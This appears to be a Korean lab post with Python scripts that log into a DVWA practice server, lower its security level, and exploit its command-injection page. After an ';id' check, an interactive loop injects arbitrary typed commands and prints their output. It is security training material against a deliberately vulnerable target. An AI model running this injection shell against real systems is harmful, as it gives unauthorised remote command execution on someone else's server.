target = DVWA 서버 (Damn Vulnerable Web App — a deliberately vulnerable lab target; run these scripts only against an instance you own or are explicitly authorized to test)

 

 

Command injection.py

# (0) Module Import
import re
import os
import sys
import requests
from bs4 import BeautifulSoup

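# (1) prepare : banner message / intercepting proxy / User-Agent

banner_msg = '''
==================================================
      Remote Command Injection Program
            Written by t4kud4ddy
==================================================
'''
# Every request is routed through a local intercepting proxy (Burp/mitmproxy
# style) so the traffic can be inspected.
# NOTE(review): the 'https' entry uses an https:// scheme, which makes requests
# speak TLS *to the proxy itself*; most intercepting proxies listen for plain
# http://HOST:PORT.  It is never exercised here because every target URL in
# this script is plain http, but fix it before adding https targets.
proxies = {'http': 'http://127.0.0.1:9000', 'https': 'https://127.0.0.1:9000'}
# Browser-looking User-Agent so the requests are not trivially tagged as python-requests.
headers = {'user-agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.6.26-1-amd64) Lobo/0.98.3'}

# The banner was defined but never displayed; show it once at startup.
print(banner_msg)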

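# (2) Login
# method = POST
# url = http://192.168.10.134/dvwa/login.php
# data = username=admin&password=password&Login=Login
# ok_msg = 'Welcome to Damn Vulnerable Web App!'

# These are DVWA's shipped default credentials for a lab box; hard-coding them
# is acceptable here only because the target is a throwaway lab instance.
login_url = "http://192.168.10.134/dvwa/login.php"
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
login_msg = 'Welcome to Damn Vulnerable Web App!'

# One Session so the cookie set by the login is carried into the
# security-level and exec requests that follow.
s = requests.Session()
# timeout: without one, requests blocks forever if the proxy or the target is down.
req = s.post(login_url, data=login_data, proxies=proxies, headers=headers, timeout=10)
# Parse the response body; on success the welcome text is in the page's first <h1>.
soup = BeautifulSoup(req.text, 'lxml')

# str(soup.h1) rather than soup.h1.string: .string is None when the tag is
# missing or contains nested markup, and str(None) simply fails to match
# instead of raising.  The expected text is a literal, not a pattern, so a
# substring test replaces the original re.search (same result, no regex
# metacharacter surprises).
if login_msg in str(soup.h1):
    print("[  OK  ] Login Success!")
else:
    print('[ WARN ] Login Failed!')
    # Exit statuses >= 2 are used for application failures; 1 is conventionally
    # reserved for usage/argument errors.
    sys.exit(2)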

# input()
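# (3) Security Level
# method : POST
# url : 'http://192.168.10.134/dvwa/security.php'
# data : security=low&seclev_submit=Submit
# set_msg : 'Security level set to low'

sec_url = 'http://192.168.10.134/dvwa/security.php'
sec_data = {'security': 'low', 'seclev_submit': 'Submit'}
sec_msg = 'Security level set to low'

# timeout: without one, requests blocks forever if the proxy or the target is down.
req = s.post(sec_url, data=sec_data, proxies=proxies, headers=headers, timeout=10)
soup = BeautifulSoup(req.text, 'lxml')

# BUG FIX: the original passed {'class', 'message'} -- a *set*, not a dict --
# as find_all's attrs argument.  bs4 treats a non-dict attrs value as a class
# filter, so it happened to match divs whose class is 'message' (or 'class'),
# but the intended attribute filter is the dict below.
messages = soup.find_all('div', {'class': 'message'})
# DVWA confirms the change in a message box; look for the literal text in it.
if any(sec_msg in div.get_text() for div in messages):
    print("[  OK  ] Security level set to Low")
else:
    print("[ WARN ] Check the Security Level")
    sys.exit(3)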

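# (4) Command Injection vulnerability check
# method : POST
# url : 'http://192.168.10.134/dvwa/vulnerabilities/exec/'
# data = ip=127.0.0.1%3Bid&submit=submit
# check_cmd = 127.0.0.1;id
# ok_msg = 'www-data'

cmd_url = 'http://192.168.10.134/dvwa/vulnerabilities/exec/'
CMD = 'id'
# The exec page hands the `ip` field to a shell command.  At security level
# "low" (set above) nothing is filtered, so ';' terminates that command and
# CMD runs after it on the target.
vulncheck_cmd = '127.0.0.1;%s' % CMD
cmd_data = {'ip': vulncheck_cmd, 'submit': 'submit'}

# timeout: without one, requests blocks forever if the proxy or the target is down.
req = s.post(cmd_url, data=cmd_data, headers=headers, proxies=proxies, timeout=10)
soup = BeautifulSoup(req.text, 'lxml')

# The command output is echoed inside a <pre>.  .get_text() instead of
# .string: .string is None when the tag is absent or has child tags, and
# re.search(..., None) raised TypeError instead of reporting "not possible".
output = soup.pre.get_text() if soup.pre is not None else ''

# NOTE(review): 'www-data' is the web-server user on Debian/Ubuntu.  If the
# DVWA host runs the server as another user (e.g. 'apache'), this check is a
# false negative even though `id` executed; matching 'uid=' would be
# distribution-independent.
ok_msg = 'www-data'
if ok_msg in output:
    print("[  OK  ] Command Injection is Possible")
else:
    print("[ WARN ] Command Injection is not possible!")
    sys.exit(4)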

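# (5) Command Injection Attack
# 5-1) CMD : interactive loop -- keep reading commands until the operator quits

# Each line typed is appended after '127.0.0.1;' and posted to the vulnerable
# exec page; the output is written to result.log and echoed back.  Type 'quit'
# (or send EOF with Ctrl-D) to stop.  The prompt is cosmetic: commands run as
# the web server's user on the target, not as root.
while True:
    try:
        CMD = input('[root@localhost ~]# : ')
    except EOFError:
        # Ctrl-D used to escape the loop with a traceback; treat it like 'quit'.
        print()
        break
    if CMD == 'quit':
        break  # leaves only this loop
    vulncheck_cmd = '127.0.0.1;%s' % CMD
    cmd_data = {'ip': vulncheck_cmd, 'submit': 'submit'}
    # timeout: without one, requests blocks forever if the proxy or the target is down.
    req = s.post(cmd_url, data=cmd_data, headers=headers, proxies=proxies, timeout=10)
    soup = BeautifulSoup(req.text, 'lxml')

    # .string is None for an empty or nested <pre>; that used to crash fd.write().
    output = soup.pre.get_text() if soup.pre is not None else ''

    # Keep the raw output of the last command on disk, as before.
    logfile = 'result.log'
    with open(logfile, 'w') as fd:
        fd.write(output)

    # The original shelled out (`cat result.log | sed '1,8d'`) just to drop the
    # first eight lines -- the ping output that precedes the injected command's
    # output.  Do the same cut in Python: no local shell, no dependency on cat/sed.
    # NOTE(review): the fixed 8-line skip assumes ping's output is exactly eight
    # lines; if the target's ping prints differently the cut will be off.
    print("\n======== Command Output Begin =========")
    print('\n'.join(output.splitlines()[8:]))
    print("-------- Command Output End ------------\n")

# 5-2) Result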

# 5-2) Result

 

 

함수화 시킨 버전

import re
import os
import sys
import requests
from bs4 import BeautifulSoup

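# Banner Message
banner_msg = """
==================================
Remote Command Injection Program 
            Written by t4kud4ddy
==================================
"""

# Proxy & User-Agent
# (proxies, headers, login_url and login_data were each assigned twice in the
#  original; the first copies were dead assignments immediately overwritten, so
#  only the effective values are kept here.)
proxies = {'http': 'http://127.0.0.1:9000', 'https': 'https://127.0.0.1:9000'}
headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0'}

# Remote Command Injection Procedure
# 1) Login
# 2) Security Level
# 3) Command Injection vulnerable check
# 4) Command Injection Attack

# 1) Login
# Method: POST
# * url: http://192.168.10.134/dvwa/login.php
# * data: username=admin&password=password&Login=Login
# * ok_mess: 'Welcome to Damn Vulnerable Web App'
# DVWA's shipped default credentials -- acceptable only because this is a lab target.
login_url = 'http://192.168.10.134/dvwa/login.php'
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
# login_msg is not used below but was defined by the original; kept for compatibility.
login_msg = 'Welcome to Damn Vulnerable Web App!'
ok_mess_for_login = 'Welcome to Damn Vulnerable Web App'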

s = requests.Session()  # one Session: the login cookie must persist across every later request
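def dvwa_login_ok(sess, url, data, headers, proxies, mess, timeout=None):
    """POST the DVWA login form and report whether the welcome page came back.

    Args:
        sess: requests.Session that carries cookies across calls.
        url: login.php URL.
        data: form fields (username / password / Login).
        headers, proxies: passed straight through to sess.post.
        mess: pattern (re.search) expected in the page's first <h1> on success.
        timeout: seconds passed to sess.post.  None (the default, matching the
            original behaviour) waits forever; set it for unattended runs.

    Returns:
        True when *mess* is found in the <h1>, otherwise False.  A page with
        no <h1>, or an <h1> holding nested markup, now yields False instead
        of raising (soup.h1 / soup.h1.string were None in those cases).
    """
    r = sess.post(url, data=data, headers=headers, proxies=proxies, timeout=timeout)
    soup = BeautifulSoup(r.text, 'lxml')
    heading = soup.h1.get_text() if soup.h1 is not None else ''
    if re.search(mess, heading):
        print('[  OK  ] Login success.')
        return True
    print('[ WARN ] Login failed.')
    return False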

# Abort with status 2 unless the login page confirmed success.
if not dvwa_login_ok(s, login_url, login_data, headers, proxies, ok_mess_for_login):
    sys.exit(2)


# 2) Security Level
# Method: POST
# * url: 'http://192.168.10.134/dvwa/security.php'
# * data: security=low&seclev_submit=Submit
# * ok_mess: 'Security level set to low'
ok_mess_for_security = "Security level set to low"
security_data = {"security": "low", "seclev_submit": "Submit"}
security_url = "http://192.168.10.134/dvwa/security.php"

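def dvwa_securitylevel_ok(sess, url, data, headers, proxies, mess, timeout=None):
    """POST security.php to change the DVWA level and confirm it via the page's message box.

    Args:
        sess: requests.Session already holding the login cookie.
        url: security.php URL.
        data: form fields (security / seclev_submit).
        headers, proxies: passed straight through to sess.post.
        mess: pattern (re.search) expected in the <div class="message"> elements.
        timeout: seconds passed to sess.post.  None (the default, matching the
            original behaviour) waits forever; set it for unattended runs.

    Returns:
        True when *mess* appears in the message divs, otherwise False.
    """
    r = sess.post(url, data=data, headers=headers, proxies=proxies, timeout=timeout)
    soup = BeautifulSoup(r.text, 'lxml')
    # BUG FIX: the original passed {'class', 'message'} -- a *set*, not a dict.
    # bs4 treats a non-dict attrs value as a class filter, so it happened to
    # match divs with class 'message' (or 'class'); the dict is what was meant.
    messages = soup.find_all('div', {'class': 'message'})
    if re.search(mess, str(messages)):
        print('[  OK  ] Security level set to low.')
        return True
    print('[ WARN ] Security level is not set')
    return False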

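# Exit status 3 here (was 4): the original reused 4 for both this failure and
# the injection check below, so a caller could not tell them apart.  3 also
# matches the flat version of this script.
if not dvwa_securitylevel_ok(s, security_url, security_data, headers, proxies, ok_mess_for_security):
    sys.exit(3)


# 3) Command Injection vulnerable check
# Method: POST
# * url: 'http://192.168.10.134/dvwa/vulnerabilities/exec/'
# * data: ip=127.0.0.1%3Bid&submit=submit
# * ok_mess: 'www-data'
command_url = 'http://192.168.10.134/dvwa/vulnerabilities/exec/'
CMD = 'id'
# ';' terminates the command the exec page runs on the `ip` field; at level
# "low" nothing is filtered, so CMD executes after it on the target.
vulnerable_check = '127.0.0.1;%s' % CMD
command_data = {'ip': vulnerable_check, 'submit': 'submit'}
# NOTE(review): 'www-data' is Debian/Ubuntu's web-server user; on a host that
# runs the server as e.g. 'apache' this check is a false negative even though
# `id` ran.  Matching 'uid=' would be distribution-independent.
ok_mess_for_command = 'www-data'

# timeout: without one, requests blocks forever if the proxy or the target is down.
resp = s.post(command_url, data=command_data, headers=headers, proxies=proxies, timeout=10)
soup = BeautifulSoup(resp.text, 'lxml')
# .get_text() instead of .string: .string is None for an absent or nested <pre>,
# and re.search(..., None) raised TypeError instead of reporting the failure.
output = soup.pre.get_text() if soup.pre is not None else ''
if re.search(ok_mess_for_command, output):
    print('[  OK  ] Command Injection is possible.')
else:
    print('[ WARN ] Command Injection not possible.')
    sys.exit(4)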

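# 4) Command Injection Attack
# 4-1) CMD   -- read a command, inject it after '127.0.0.1;'
# 4-2) Result -- log the <pre> output and print it minus the leading ping lines

# Type 'quit' (or send EOF with Ctrl-D) to stop.  The prompt is cosmetic:
# commands run as the web server's user on the target, not as root.
while True:
    try:
        CMD = input('[root@localhost ~]# ')
    except EOFError:
        # Ctrl-D used to escape the loop with a traceback; treat it like 'quit'.
        print()
        break
    if CMD == 'quit':
        break
    vulnerable_check = '127.0.0.1;%s' % CMD
    command_data = {'ip': vulnerable_check, 'submit': 'submit'}
    # timeout: without one, requests blocks forever if the proxy or the target is down.
    resp = s.post(command_url, data=command_data, headers=headers, proxies=proxies, timeout=10)
    soup = BeautifulSoup(resp.text, 'lxml')

    # .string is None for an empty or nested <pre>; that used to crash fd.write().
    output = soup.pre.get_text() if soup.pre is not None else ''

    # Keep the raw output of the last command on disk, as before.
    logfile = 'result.log'
    with open(logfile, 'w') as fd:
        fd.write(output)

    # The original shelled out (`cat result.log | sed '1,8d'`) only to drop the
    # first eight lines -- the ping output ahead of the injected command's
    # output.  Do the same cut in Python: no local shell, no cat/sed dependency.
    # NOTE(review): the fixed 8-line skip assumes ping prints exactly eight lines.
    print('\n'.join(output.splitlines()[8:]))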

 

 

모듈 불러와 쓸때

import X
import sys
import requests
from bs4 import BeautifulSoup

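proxies = {'http': 'http://127.0.0.1:9000', 'https': 'https://127.0.0.1:9000'}
headers = {'user-agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.6.26-1-amd64) Lobo/0.98.3'}
login_url = "http://192.168.10.134/dvwa/login.php"
# DVWA's shipped default credentials -- acceptable only because this is a lab target.
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
login_msg = 'Welcome to Damn Vulnerable Web App!'

s = requests.Session()
# The original fragment did not run: `false` is not a Python name, the `if`
# had no colon, and session/url/data/msg were never defined.  Call the
# function from the imported module (X stands for the module that defines
# dvwa_login_ok) with the values defined above.
if X.dvwa_login_ok(s, login_url, login_data, headers, proxies, login_msg) is False:
    sys.exit(2)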
